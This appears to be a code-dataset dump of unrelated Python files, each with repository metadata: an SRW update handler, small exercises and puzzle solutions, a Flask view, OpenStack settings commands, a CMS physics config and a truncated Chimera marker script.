if val.isdigit():
val = int(val)
else:
try:
(storeid, id) = val.split('/', 1)
recStore = db.get_object(session, storeid)
if (id.isdigit()):
id = int(id)
except ValueError, e:
diag = Diagnostic1()
diag.details = "Could not parse record id"
raise diag
if not isinstance(recStore, RecordStore):
diag = Diagnostic1()
raise diag
else:
return recStore.fetch_record(session, id)
else:
return None
SRW.update.UpdateResponse.fetch_record = fetch_record
def handle_create(self, session, req):
db = req._db
rec = self.fetch_record(session, req)
if rec:
# Record already exists.
diag = Diagnostic1()
diag.details = "Already exists"
raise diag
doc = self.unpack_record(session, req)
# Need to get a 'create' workflow
if doc:
flow = req.config.workflowHash['info:srw/operation/1/create']
rec = flow.process(session, doc)
else:
# Create an empty record
recStore = db.get_path(session, 'recordStore')
rec = recStore.create_record(session, None)
recStore.commit_storing()
self.recordIdentifier = repr(rec)
self.operationStatus = "success"
SRW.update.UpdateResponse.handle_create = handle_create
def handle_delete(self, session, req):
db = req._db
rec = self.fetch_record(session, req)
if not rec:
diag = Diagnostic1()
raise diag
else:
flow = req.config.workflowHash['info:srw/operation/1/delete']
flow.process(session, rec)
self.operationStatus = "success"
SRW.update.UpdateResponse.handle_delete = handle_delete
def handle_replace(self, session, req):
db = req._db
rec = self.fetch_record(session, req)
doc = self.unpack_record(session, req)
if not rec:
diag = Diagnostic1()
diag.details = "No record found"
raise diag
elif not doc:
diag = Diagnostic1()
diag.details = "No replacement"
raise diag
else:
flow = req.config.workflowHash['info:srw/operation/1/delete']
flow.process(session, rec)
flow2 = req.config.workflowHash['info:srw/operation/1/create']
flow2.process(session, doc)
self.operationStatus = "success"
SRW.update.UpdateResponse.handle_replace = handle_replace
def handle_metadata(self, session, req):
diag = Diagnostic1()
diag.details = "Not yet supported"
self.diagnostics = [diag]
SRW.update.UpdateResponse.handle_metadata = handle_metadata
def process_update(self, req):
self.version = "1.1"
self.operationStatus = "fail"
if (not req.version):
diag = Diagnostic7()
diag.message = "Mandatory 'version' parameter not supplied"
diag.details = 'version'
raise diag
config = req.config
db = config.parent
req._db = db
session = Session()
session.environment = "apache"
session.database = db.id
if req.operation == "info:srw/operation/1/create":
# Do Create
self.handle_create(session, req)
elif req.operation == "info:srw/operation/1/replace":
# Do Replace
self.handle_replace(session, req)
elif req.operation == "info:srw/operation/1/delete":
# Do Delete
self.handle_delete(session, req)
elif req.operation == "info:srw/operation/1/metadata":
# Do Metadata update
self.handle_metadata(session, req)
else:
# Barf
diag = SRWDiagnostics.Diagnostic1()
diag.details = "Unknown operation: %s" % req.operation
self.diagnostics = [diag]
SRW.update.UpdateResponse.processQuery = process_update
| [
"[email protected]"
] | |
3a7381f58e016c17acdda37ca348942621b67a30 | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p02269/s429567531.py | b6858b987c9d3f9e958f07c18273052b8af703cd | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 352 | py | def insert(S, string):
S.add(string)
def find(S, string):
if string in S:
print 'yes'
else:
print 'no'
n = input()
S = set()
for i in range(n):
tmp1, tmp2 = map(str, raw_input().split())
if tmp1 == 'insert':
insert(S, tmp2)
elif tmp1 == 'find':
find(S, tmp2)
else:
print 'error!' | [
"[email protected]"
] | |
ef505cea73e5c3037f00f3f90d9413b53a1b61a9 | f5d43e47e375d6d337b919b8eb7f3393e4687864 | /lpthw/31-40/ex40_test.py | 989e12ee9cc1788d320fcf11b770a64ba098454b | [] | no_license | Cadols/LearnPython | 4a2c202b30a1d877ec75e0ec45b03f9f1c2bc52a | 2ab5cefe1f7e2c0393489e3d1d4d0c88557c2ebb | refs/heads/master | 2021-01-12T09:49:48.335014 | 2019-05-24T06:53:42 | 2019-05-24T06:53:42 | 76,265,981 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,081 | py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
class Song(object):
def __init__(self, lyrics):
self.lyrics = lyrics
def sing_me_a_song(self):
for line in self.lyrics:
print(line)
twinkle_twinkle_little_star = Song(["Twinkle twinkle little star",
"How I wonder what you are",
"Up above in the sky",
"Like a diamond in the sky"])
alphabet_song = Song(["A B C D E F G",
"H I J K L M N",
"O P Q",
"R S T",
"U V W",
"X Y Z"])
twinkle_twinkle_little_star.sing_me_a_song()
alphabet_song.sing_me_a_song()
song_a_lyrics = ["Twinkle twinkle little star", "How I wonder what you are", "Up above in the sky", "Like a diamond in the sky"]
song_b_lyrics = ["A B C D E F G", "H I J K L M N", "O P Q", "R S T", "U V W", "X Y Z"]
song_a = Song(song_a_lyrics)
song_b = Song(song_b_lyrics)
song_a.sing_me_a_song()
song_b.sing_me_a_song()
| [
"[email protected]"
] | |
39420f4dd8ab7e282152b8a385260ae3dba14513 | a5c4e1ab36972c0bbc2526612a9ade95768b32b1 | /ailtdou/main/views.py | 0b1bc567a56e9b5a702bf5eee1b8e4cb4008b087 | [] | no_license | tonyseek/ailtdou | 5587e76e3c34b3533c73d2acded5b8134bbd8ad3 | 435cad7fd127a6fc7974b1413ec0299ca2dd359d | refs/heads/master | 2021-01-23T00:14:55.509037 | 2018-10-13T12:46:27 | 2018-10-13T12:46:27 | 19,821,141 | 0 | 0 | null | 2018-08-14T07:14:38 | 2014-05-15T13:54:50 | Python | UTF-8 | Python | false | false | 286 | py | from flask import Blueprint, render_template
from flask_login import current_user
bp = Blueprint('main', __name__)
@bp.route('/')
def home():
if current_user.is_anonymous():
return render_template('login.html')
return render_template('user.html', user=current_user)
| [
"[email protected]"
] | |
c6443e9e4d16553be2ab62035dacb3504dc0b0e7 | 94ca446c0f17d640f45941fa7c83530ef2fbc099 | /wrs-remote-clients-2.0.2/python-openstackclient-3.12.0/build/lib/openstackclient/network/v2/setting.py | d404325e8ea16391d3a58e77a79b68bf48806a91 | [
"LicenseRef-scancode-unknown-license-reference",
"Apache-2.0"
] | permissive | rmoorewrs/tic-windows-remote-clients | c1c2b8924e90ffd2951571bc098ec9873ffd3988 | ae16ee78a720852304d79f8b86dfe44e920cc72d | refs/heads/master | 2023-05-25T13:55:55.603100 | 2019-05-31T20:59:28 | 2019-05-31T20:59:28 | 189,649,925 | 0 | 0 | NOASSERTION | 2023-05-22T20:43:59 | 2019-05-31T19:46:28 | Python | UTF-8 | Python | false | false | 6,210 | py | # Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
# Copyright (c) 2016 Wind River Systems, Inc.
#
# The right to copy, distribute, modify, or otherwise make use
# of this software may be licensed only pursuant to the terms
# of an applicable Wind River license agreement.
#
"""Settings action implementations"""
from osc_lib.command import command
from osc_lib import exceptions
from osc_lib import utils
from openstackclient.i18n import _
from openstackclient.identity import common as identity_common
from openstackclient.network import common
from openstackclient.network import sdk_utils
_formatters = {}
def _get_columns(item):
column_map = {"id": "project_id"}
invisible_columns = ["name"]
return sdk_utils.get_osc_show_columns_for_sdk_resource(item, column_map,
invisible_columns)
def _get_attrs(client_manager, parsed_args):
attrs = {key: parsed_args[key] for key in ["mac_filtering"]
if key in parsed_args}
if 'project' in parsed_args and parsed_args["project"] is not None:
identity_client = client_manager.identity
project_id = identity_common.find_project(
identity_client,
parsed_args["project"]
).id
attrs['project_id'] = project_id
return attrs
class ListSetting(common.NetworkAndComputeLister):
"""List settings of all projects who have non-default setting values"""
def update_parser_common(self, parser):
return parser
def take_action_network(self, client, parsed_args):
columns = (
'mac_filtering',
'project_id'
)
column_headers = (
'Mac Filtering',
'Project ID'
)
args = {}
data = client.settings(**args)
return (column_headers,
(utils.get_item_properties(
s, columns,
formatters=_formatters,
) for s in data))
def take_action_compute(self, client, parsed_args):
raise exceptions.CommandError("This command needs access to"
" a network endpoint.")
return
class ShowSetting(common.NetworkAndComputeShowOne):
"""Show settings of a given project"""
def update_parser_common(self, parser):
parser.add_argument(
'--project',
metavar='<project>',
help=_("Owner's project (name or ID)"),
required=False
)
return parser
def take_action_network(self, client, parsed_args):
client = self.app.client_manager.network
# if no project id is specified, operate on current project
args = _get_attrs(self.app.client_manager, vars(parsed_args))
if not "project_id" in args:
args["project_id"] = client.find_tenant().project_id
project_id = args["project_id"]
obj = client.find_setting(project_id, ignore_missing=False)
display_columns, columns = _get_columns(obj)
data = utils.get_item_properties(obj, columns, formatters=_formatters)
return (display_columns, data)
def take_action_compute(self, client, parsed_args):
raise exceptions.CommandError("This command needs access to"
" a network endpoint.")
return
# this one uses NetworkAndComputeCommand because settings can be deleted
# without a project id
class DeleteSetting(common.NetworkAndComputeCommand):
"""Delete setting"""
def update_parser_common(self, parser):
parser.add_argument(
'--project',
metavar='<project>',
help=_("Owner's project (name or ID)"),
required=False
)
return parser
def take_action_network(self, client, parsed_args):
client = self.app.client_manager.network
# if no project id is specified, operate on current project
args = _get_attrs(self.app.client_manager, vars(parsed_args))
if not "project_id" in args:
args["project_id"] = client.find_tenant().project_id
project_id = args["project_id"]
client.delete_setting(project_id)
return
def take_action_compute(self, client, parsed_args):
raise exceptions.CommandError("This command needs "
"access to a network endpoint.")
return
class UpdateSetting(command.Command):
"""Set setting properties"""
def get_parser(self, prog_name):
parser = super(UpdateSetting, self).get_parser(prog_name)
parser.add_argument(
'--project',
metavar='<project>',
help=_("Owner's project (name or ID)"),
required=False
)
parser.add_argument('--mac-filtering', metavar='mac_filtering',
help="Enable/Disable source MAC filtering"
" on all ports",
required=True)
return parser
def take_action(self, parsed_args):
client = self.app.client_manager.network
# if no project id is specified, operate on current project
args = _get_attrs(self.app.client_manager, vars(parsed_args))
if not "project_id" in args:
args["project_id"] = client.find_tenant().project_id
project_id = args["project_id"]
del args['project_id']
client.find_setting(project_id, ignore_missing=False)
if args == {}:
msg = "Nothing specified to be set"
raise exceptions.CommandError(msg)
client.update_setting(project_id, **args)
return
| [
"[email protected]"
] | |
4dcda6e3044084bdf2aa6af4f9ccad28c448e2bb | 2455062787d67535da8be051ac5e361a097cf66f | /Producers/BSUB/TrigProd_amumu_a5_dR5/trigger_amumu_producer_cfg_TrigProd_amumu_a5_dR5_691.py | bd6632802d1ac740f25ab863bcfb3124a43b8893 | [] | no_license | kmtos/BBA-RecoLevel | 6e153c08d5ef579a42800f6c11995ee55eb54846 | 367adaa745fbdb43e875e5ce837c613d288738ab | refs/heads/master | 2021-01-10T08:33:45.509687 | 2015-12-04T09:20:14 | 2015-12-04T09:20:14 | 43,355,189 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,360 | py | import FWCore.ParameterSet.Config as cms
process = cms.Process("PAT")
#process.load("BBA/Analyzer/bbaanalyzer_cfi")
process.load("FWCore.MessageLogger.MessageLogger_cfi")
process.load('Configuration.EventContent.EventContent_cff')
process.load("Configuration.Geometry.GeometryRecoDB_cff")
process.load("Configuration.StandardSequences.FrontierConditions_GlobalTag_cff")
process.load("PhysicsTools.PatAlgos.producersLayer1.patCandidates_cff")
process.load("PhysicsTools.PatAlgos.selectionLayer1.selectedPatCandidates_cff")
from Configuration.AlCa.GlobalTag import GlobalTag
process.GlobalTag = GlobalTag(process.GlobalTag, 'MCRUN2_71_V1::All', '')
process.load("Configuration.StandardSequences.MagneticField_cff")
####################
# Message Logger
####################
process.MessageLogger.cerr.FwkReport.reportEvery = cms.untracked.int32(100)
process.options = cms.untracked.PSet( wantSummary = cms.untracked.bool(True) )
process.maxEvents = cms.untracked.PSet( input = cms.untracked.int32(-1) )
## switch to uncheduled mode
process.options.allowUnscheduled = cms.untracked.bool(True)
process.maxEvents = cms.untracked.PSet(
input = cms.untracked.int32(500)
)
####################
# Input File List
####################
# Input source
process.source = cms.Source("PoolSource",
fileNames = cms.untracked.vstring('root://eoscms//eos/cms/store/user/ktos/RECO_Step3_amumu_a5/RECO_Step3_amumu_a5_691.root'),
secondaryFileNames = cms.untracked.vstring()
)
############################################################
# Defining matching in DeltaR, sorting by best DeltaR
############################################################
process.mOniaTrigMatch = cms.EDProducer("PATTriggerMatcherDRLessByR",
src = cms.InputTag( 'slimmedMuons' ),
matched = cms.InputTag( 'patTrigger' ), # selections of trigger objects
matchedCuts = cms.string( 'type( "TriggerMuon" ) && path( "HLT_Mu16_TkMu0_dEta18_Onia*")' ), # input does not yet have the 'saveTags' parameter in HLT
maxDPtRel = cms.double( 0.5 ), # no effect here
maxDeltaR = cms.double( 0.3 ), #### selection of matches
maxDeltaEta = cms.double( 0.2 ), # no effect here
resolveAmbiguities = cms.bool( True ),# definition of matcher output
resolveByMatchQuality = cms.bool( True )# definition of matcher output
)
# talk to output module
process.out = cms.OutputModule("PoolOutputModule",
fileName = cms.untracked.string("file:RECO_Step3_amumu_a5_TrigProd_691.root"),
outputCommands = process.MINIAODSIMEventContent.outputCommands
)
process.out.outputCommands += [ 'drop *_*_*_*',
'keep *_*slimmed*_*_*',
'keep *_pfTausEI_*_*',
'keep *_hpsPFTauProducer_*_*',
'keep *_hltTriggerSummaryAOD_*_*',
'keep *_TriggerResults_*_HLT',
'keep *_patTrigger*_*_*',
'keep *_prunedGenParticles_*_*',
'keep *_mOniaTrigMatch_*_*'
]
################################################################################
# Running the matching and setting the the trigger on
################################################################################
from PhysicsTools.PatAlgos.tools.trigTools import *
switchOnTrigger( process ) # This is optional and can be omitted.
switchOnTriggerMatching( process, triggerMatchers = [ 'mOniaTrigMatch'
])
process.outpath = cms.EndPath(process.out)
| [
"[email protected]"
] | |
108663704ef930b8ae22d2ab13c3c6ab61c0cef9 | 487ce91881032c1de16e35ed8bc187d6034205f7 | /codes/CodeJamCrawler/16_0_3/Sean223/verify.py | 9ca777f0f93c2d4c309547e0376387d1fabe7ab7 | [] | no_license | DaHuO/Supergraph | 9cd26d8c5a081803015d93cf5f2674009e92ef7e | c88059dc66297af577ad2b8afa4e0ac0ad622915 | refs/heads/master | 2021-06-14T16:07:52.405091 | 2016-08-21T13:39:13 | 2016-08-21T13:39:13 | 49,829,508 | 2 | 0 | null | 2021-03-19T21:55:46 | 2016-01-17T18:23:00 | Python | UTF-8 | Python | false | false | 1,426 | py | IN_FILE = "large.txt"
with open(IN_FILE, 'r') as fileIn:
fileLines = fileIn.readlines()
it = iter(fileLines)
assert(next(it).strip() == 'Case #1:')
jamcoins_found = []
for i in range(1, 501):
message = "Jamcoin on line " + str(i)
line = next(it).strip().split()
if not len(line) == 10:
print(message + " had the wrong number of divisors listed!")
jamcoin = line[0]
if jamcoin in jamcoins_found:
print(message + " was a duplicate!!")
jamcoins_found.append(jamcoin)
if not jamcoin[0] == '1':
print(message + " did not start with 1!")
if not jamcoin[-1] == '1':
print(message + " did not end with 1!")
for digit in jamcoin:
if digit not in ('0', '1'):
print(message + " had a non-binary digit!")
if not len(jamcoin) == 32:
print(message + " did not have 32 digits!")
for base in range(2, 11):
proposed_divisor = int(line[base-1])
jamcoin_in_base = int(jamcoin, base)
if proposed_divisor == 1 or proposed_divisor == jamcoin_in_base:
print(message + " had a trivial divisor listed for base " + str(base))
if not jamcoin_in_base % proposed_divisor == 0:
print(message + " did not have a correct divisor listed for base " + str(base))
if not len(jamcoins_found) == 500:
print("Did not find 500 jamcoins!")
| [
"[[email protected]]"
] | |
0bc0c90132733dee274a4c250af2557a3807546b | 5574620c834f96d4baf50d6aa349242dae7c17af | /172.factorial-trailing-zeroes.py | 37c2400fe3fdb6a94b967b7880dcca016d4f563b | [] | no_license | Ming-H/leetcode | 52dceba5f9a605afbdaa65e286a37205873e21bb | 057cee4b830603ac12976ed7d5cea8d06a9b46a0 | refs/heads/main | 2023-09-02T21:30:48.796395 | 2023-09-01T01:59:48 | 2023-09-01T01:59:48 | 489,290,172 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 274 | py | #
# @lc app=leetcode id=172 lang=python3
#
# [172] Factorial Trailing Zeroes
#
# @lc code=start
class Solution:
def trailingZeroes(self, n: int) -> int:
r = 0
while n > 0:
n //= 5
r += n
return r
# @lc code=end
| [
"[email protected]"
] | |
1310ca612a18d36486b9f755bcbff9756da40ecc | 711756b796d68035dc6a39060515200d1d37a274 | /output_cog/optimized_34363.py | 4adad9b5db9a1bcae4005a3b8c7a2a480b3303be | [] | no_license | batxes/exocyst_scripts | 8b109c279c93dd68c1d55ed64ad3cca93e3c95ca | a6c487d5053b9b67db22c59865e4ef2417e53030 | refs/heads/master | 2020-06-16T20:16:24.840725 | 2016-11-30T16:23:16 | 2016-11-30T16:23:16 | 75,075,164 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,839 | py | import _surface
import chimera
try:
import chimera.runCommand
except:
pass
from VolumePath import markerset as ms
try:
from VolumePath import Marker_Set, Link
new_marker_set=Marker_Set
except:
from VolumePath import volume_path_dialog
d= volume_path_dialog(True)
new_marker_set= d.new_marker_set
marker_sets={}
surf_sets={}
if "Cog2_GFPN" not in marker_sets:
s=new_marker_set('Cog2_GFPN')
marker_sets["Cog2_GFPN"]=s
s= marker_sets["Cog2_GFPN"]
mark=s.place_marker((463.03, 615.441, 586.439), (0.89, 0.1, 0.1), 18.4716)
if "Cog2_0" not in marker_sets:
s=new_marker_set('Cog2_0')
marker_sets["Cog2_0"]=s
s= marker_sets["Cog2_0"]
mark=s.place_marker((435.252, 551.517, 585.94), (0.89, 0.1, 0.1), 17.1475)
if "Cog2_1" not in marker_sets:
s=new_marker_set('Cog2_1')
marker_sets["Cog2_1"]=s
s= marker_sets["Cog2_1"]
mark=s.place_marker((395.458, 481.406, 585.935), (0.89, 0.1, 0.1), 17.1475)
if "Cog2_GFPC" not in marker_sets:
s=new_marker_set('Cog2_GFPC')
marker_sets["Cog2_GFPC"]=s
s= marker_sets["Cog2_GFPC"]
mark=s.place_marker((346.022, 591.453, 654.784), (0.89, 0.1, 0.1), 18.4716)
if "Cog2_Anch" not in marker_sets:
s=new_marker_set('Cog2_Anch')
marker_sets["Cog2_Anch"]=s
s= marker_sets["Cog2_Anch"]
mark=s.place_marker((329.838, 301.054, 554.949), (0.89, 0.1, 0.1), 18.4716)
if "Cog3_GFPN" not in marker_sets:
s=new_marker_set('Cog3_GFPN')
marker_sets["Cog3_GFPN"]=s
s= marker_sets["Cog3_GFPN"]
mark=s.place_marker((448.856, 571.409, 589.806), (1, 1, 0), 18.4716)
if "Cog3_0" not in marker_sets:
s=new_marker_set('Cog3_0')
marker_sets["Cog3_0"]=s
s= marker_sets["Cog3_0"]
mark=s.place_marker((449.961, 573.045, 590.146), (1, 1, 0.2), 17.1475)
if "Cog3_1" not in marker_sets:
s=new_marker_set('Cog3_1')
marker_sets["Cog3_1"]=s
s= marker_sets["Cog3_1"]
mark=s.place_marker((464.274, 596.365, 596.552), (1, 1, 0.2), 17.1475)
if "Cog3_2" not in marker_sets:
s=new_marker_set('Cog3_2')
marker_sets["Cog3_2"]=s
s= marker_sets["Cog3_2"]
mark=s.place_marker((471.604, 601.497, 623.292), (1, 1, 0.2), 17.1475)
if "Cog3_3" not in marker_sets:
s=new_marker_set('Cog3_3')
marker_sets["Cog3_3"]=s
s= marker_sets["Cog3_3"]
mark=s.place_marker((481.087, 587.864, 646.05), (1, 1, 0.2), 17.1475)
if "Cog3_4" not in marker_sets:
s=new_marker_set('Cog3_4')
marker_sets["Cog3_4"]=s
s= marker_sets["Cog3_4"]
mark=s.place_marker((478.173, 574.946, 670.864), (1, 1, 0.2), 17.1475)
if "Cog3_5" not in marker_sets:
s=new_marker_set('Cog3_5')
marker_sets["Cog3_5"]=s
s= marker_sets["Cog3_5"]
mark=s.place_marker((500.29, 558.397, 666.919), (1, 1, 0.2), 17.1475)
if "Cog3_GFPC" not in marker_sets:
s=new_marker_set('Cog3_GFPC')
marker_sets["Cog3_GFPC"]=s
s= marker_sets["Cog3_GFPC"]
mark=s.place_marker((459.303, 592.27, 573.42), (1, 1, 0.4), 18.4716)
if "Cog3_Anch" not in marker_sets:
s=new_marker_set('Cog3_Anch')
marker_sets["Cog3_Anch"]=s
s= marker_sets["Cog3_Anch"]
mark=s.place_marker((544.93, 522.969, 755.951), (1, 1, 0.4), 18.4716)
if "Cog4_GFPN" not in marker_sets:
s=new_marker_set('Cog4_GFPN')
marker_sets["Cog4_GFPN"]=s
s= marker_sets["Cog4_GFPN"]
mark=s.place_marker((461.856, 359.103, 671.702), (0, 0, 0.8), 18.4716)
if "Cog4_0" not in marker_sets:
s=new_marker_set('Cog4_0')
marker_sets["Cog4_0"]=s
s= marker_sets["Cog4_0"]
mark=s.place_marker((461.856, 359.103, 671.702), (0, 0, 0.8), 17.1475)
if "Cog4_1" not in marker_sets:
s=new_marker_set('Cog4_1')
marker_sets["Cog4_1"]=s
s= marker_sets["Cog4_1"]
mark=s.place_marker((466.584, 383.418, 658.269), (0, 0, 0.8), 17.1475)
if "Cog4_2" not in marker_sets:
s=new_marker_set('Cog4_2')
marker_sets["Cog4_2"]=s
s= marker_sets["Cog4_2"]
mark=s.place_marker((469.21, 408.41, 644.77), (0, 0, 0.8), 17.1475)
if "Cog4_3" not in marker_sets:
s=new_marker_set('Cog4_3')
marker_sets["Cog4_3"]=s
s= marker_sets["Cog4_3"]
mark=s.place_marker((472.187, 434.749, 633.626), (0, 0, 0.8), 17.1475)
if "Cog4_4" not in marker_sets:
s=new_marker_set('Cog4_4')
marker_sets["Cog4_4"]=s
s= marker_sets["Cog4_4"]
mark=s.place_marker((469.974, 460.904, 621.858), (0, 0, 0.8), 17.1475)
if "Cog4_5" not in marker_sets:
s=new_marker_set('Cog4_5')
marker_sets["Cog4_5"]=s
s= marker_sets["Cog4_5"]
mark=s.place_marker((469.293, 485.766, 607.281), (0, 0, 0.8), 17.1475)
if "Cog4_6" not in marker_sets:
s=new_marker_set('Cog4_6')
marker_sets["Cog4_6"]=s
s= marker_sets["Cog4_6"]
mark=s.place_marker((452.998, 506.566, 595.643), (0, 0, 0.8), 17.1475)
if "Cog4_GFPC" not in marker_sets:
s=new_marker_set('Cog4_GFPC')
marker_sets["Cog4_GFPC"]=s
s= marker_sets["Cog4_GFPC"]
mark=s.place_marker((489.582, 389.33, 822.51), (0, 0, 0.8), 18.4716)
if "Cog4_Anch" not in marker_sets:
s=new_marker_set('Cog4_Anch')
marker_sets["Cog4_Anch"]=s
s= marker_sets["Cog4_Anch"]
mark=s.place_marker((423.122, 630.145, 368.908), (0, 0, 0.8), 18.4716)
if "Cog5_GFPN" not in marker_sets:
s=new_marker_set('Cog5_GFPN')
marker_sets["Cog5_GFPN"]=s
s= marker_sets["Cog5_GFPN"]
mark=s.place_marker((438.145, 480.835, 565.963), (0.3, 0.3, 0.3), 18.4716)
if "Cog5_0" not in marker_sets:
s=new_marker_set('Cog5_0')
marker_sets["Cog5_0"]=s
s= marker_sets["Cog5_0"]
mark=s.place_marker((438.145, 480.835, 565.963), (0.3, 0.3, 0.3), 17.1475)
if "Cog5_1" not in marker_sets:
s=new_marker_set('Cog5_1')
marker_sets["Cog5_1"]=s
s= marker_sets["Cog5_1"]
mark=s.place_marker((414.717, 498.44, 563.469), (0.3, 0.3, 0.3), 17.1475)
if "Cog5_2" not in marker_sets:
s=new_marker_set('Cog5_2')
marker_sets["Cog5_2"]=s
s= marker_sets["Cog5_2"]
mark=s.place_marker((386.317, 505.164, 565.389), (0.3, 0.3, 0.3), 17.1475)
if "Cog5_3" not in marker_sets:
s=new_marker_set('Cog5_3')
marker_sets["Cog5_3"]=s
s= marker_sets["Cog5_3"]
mark=s.place_marker((371.19, 506.819, 590.189), (0.3, 0.3, 0.3), 17.1475)
if "Cog5_GFPC" not in marker_sets:
s=new_marker_set('Cog5_GFPC')
marker_sets["Cog5_GFPC"]=s
s= marker_sets["Cog5_GFPC"]
mark=s.place_marker((406.822, 626.084, 598.243), (0.3, 0.3, 0.3), 18.4716)
if "Cog5_Anch" not in marker_sets:
s=new_marker_set('Cog5_Anch')
marker_sets["Cog5_Anch"]=s
s= marker_sets["Cog5_Anch"]
mark=s.place_marker((332.443, 387.855, 589.797), (0.3, 0.3, 0.3), 18.4716)
if "Cog6_GFPN" not in marker_sets:
s=new_marker_set('Cog6_GFPN')
marker_sets["Cog6_GFPN"]=s
s= marker_sets["Cog6_GFPN"]
mark=s.place_marker((416.906, 574.29, 589.199), (0.21, 0.49, 0.72), 18.4716)
if "Cog6_0" not in marker_sets:
s=new_marker_set('Cog6_0')
marker_sets["Cog6_0"]=s
s= marker_sets["Cog6_0"]
mark=s.place_marker((416.88, 574.312, 589.205), (0.21, 0.49, 0.72), 17.1475)
if "Cog6_1" not in marker_sets:
s=new_marker_set('Cog6_1')
marker_sets["Cog6_1"]=s
s= marker_sets["Cog6_1"]
mark=s.place_marker((423.943, 576.44, 562.068), (0.21, 0.49, 0.72), 17.1475)
if "Cog6_2" not in marker_sets:
s=new_marker_set('Cog6_2')
marker_sets["Cog6_2"]=s
s= marker_sets["Cog6_2"]
mark=s.place_marker((448.522, 562.629, 557.49), (0.21, 0.49, 0.72), 17.1475)
if "Cog6_3" not in marker_sets:
s=new_marker_set('Cog6_3')
marker_sets["Cog6_3"]=s
s= marker_sets["Cog6_3"]
mark=s.place_marker((469.749, 551.597, 573.654), (0.21, 0.49, 0.72), 17.1475)
if "Cog6_4" not in marker_sets:
s=new_marker_set('Cog6_4')
marker_sets["Cog6_4"]=s
s= marker_sets["Cog6_4"]
mark=s.place_marker((482.386, 557.336, 599.018), (0.21, 0.49, 0.72), 17.1475)
if "Cog6_5" not in marker_sets:
s=new_marker_set('Cog6_5')
marker_sets["Cog6_5"]=s
s= marker_sets["Cog6_5"]
mark=s.place_marker((501.788, 551.486, 619.309), (0.21, 0.49, 0.72), 17.1475)
if "Cog6_6" not in marker_sets:
s=new_marker_set('Cog6_6')
marker_sets["Cog6_6"]=s
s= marker_sets["Cog6_6"]
mark=s.place_marker((519.213, 549.9, 641.465), (0.21, 0.49, 0.72), 17.1475)
if "Cog6_GFPC" not in marker_sets:
s=new_marker_set('Cog6_GFPC')
marker_sets["Cog6_GFPC"]=s
s= marker_sets["Cog6_GFPC"]
mark=s.place_marker((501.823, 528.275, 560.158), (0.21, 0.49, 0.72), 18.4716)
if "Cog6_Anch" not in marker_sets:
s=new_marker_set('Cog6_Anch')
marker_sets["Cog6_Anch"]=s
s= marker_sets["Cog6_Anch"]
mark=s.place_marker((531.577, 572.343, 724.916), (0.21, 0.49, 0.72), 18.4716)
if "Cog7_GFPN" not in marker_sets:
s=new_marker_set('Cog7_GFPN')
marker_sets["Cog7_GFPN"]=s
s= marker_sets["Cog7_GFPN"]
mark=s.place_marker((465.272, 527.711, 531.944), (0.7, 0.7, 0.7), 18.4716)
if "Cog7_0" not in marker_sets:
s=new_marker_set('Cog7_0')
marker_sets["Cog7_0"]=s
s= marker_sets["Cog7_0"]
mark=s.place_marker((443.024, 528.618, 547.572), (0.7, 0.7, 0.7), 17.1475)
if "Cog7_1" not in marker_sets:
s=new_marker_set('Cog7_1')
marker_sets["Cog7_1"]=s
s= marker_sets["Cog7_1"]
mark=s.place_marker((394.808, 534.128, 579.598), (0.7, 0.7, 0.7), 17.1475)
if "Cog7_2" not in marker_sets:
s=new_marker_set('Cog7_2')
marker_sets["Cog7_2"]=s
s= marker_sets["Cog7_2"]
mark=s.place_marker((347.325, 537.717, 610.921), (0.7, 0.7, 0.7), 17.1475)
if "Cog7_GFPC" not in marker_sets:
s=new_marker_set('Cog7_GFPC')
marker_sets["Cog7_GFPC"]=s
s= marker_sets["Cog7_GFPC"]
mark=s.place_marker((346.237, 612.866, 581.185), (0.7, 0.7, 0.7), 18.4716)
if "Cog7_Anch" not in marker_sets:
s=new_marker_set('Cog7_Anch')
marker_sets["Cog7_Anch"]=s
s= marker_sets["Cog7_Anch"]
mark=s.place_marker((285.188, 485.681, 675.893), (0.7, 0.7, 0.7), 18.4716)
if "Cog8_0" not in marker_sets:
s=new_marker_set('Cog8_0')
marker_sets["Cog8_0"]=s
s= marker_sets["Cog8_0"]
mark=s.place_marker((431.669, 554.157, 528.891), (1, 0.5, 0), 17.1475)
if "Cog8_1" not in marker_sets:
s=new_marker_set('Cog8_1')
marker_sets["Cog8_1"]=s
s= marker_sets["Cog8_1"]
mark=s.place_marker((418.813, 538.895, 509.604), (1, 0.5, 0), 17.1475)
if "Cog8_2" not in marker_sets:
s=new_marker_set('Cog8_2')
marker_sets["Cog8_2"]=s
s= marker_sets["Cog8_2"]
mark=s.place_marker((401.07, 525.818, 492.816), (1, 0.5, 0), 17.1475)
if "Cog8_3" not in marker_sets:
s=new_marker_set('Cog8_3')
marker_sets["Cog8_3"]=s
s= marker_sets["Cog8_3"]
mark=s.place_marker((377.354, 511.237, 492.115), (1, 0.5, 0), 17.1475)
if "Cog8_4" not in marker_sets:
s=new_marker_set('Cog8_4')
marker_sets["Cog8_4"]=s
s= marker_sets["Cog8_4"]
mark=s.place_marker((363.701, 506.923, 516.183), (1, 0.5, 0), 17.1475)
if "Cog8_5" not in marker_sets:
s=new_marker_set('Cog8_5')
marker_sets["Cog8_5"]=s
s= marker_sets["Cog8_5"]
mark=s.place_marker((370.113, 487.034, 535.024), (1, 0.5, 0), 17.1475)
if "Cog8_GFPC" not in marker_sets:
s=new_marker_set('Cog8_GFPC')
marker_sets["Cog8_GFPC"]=s
s= marker_sets["Cog8_GFPC"]
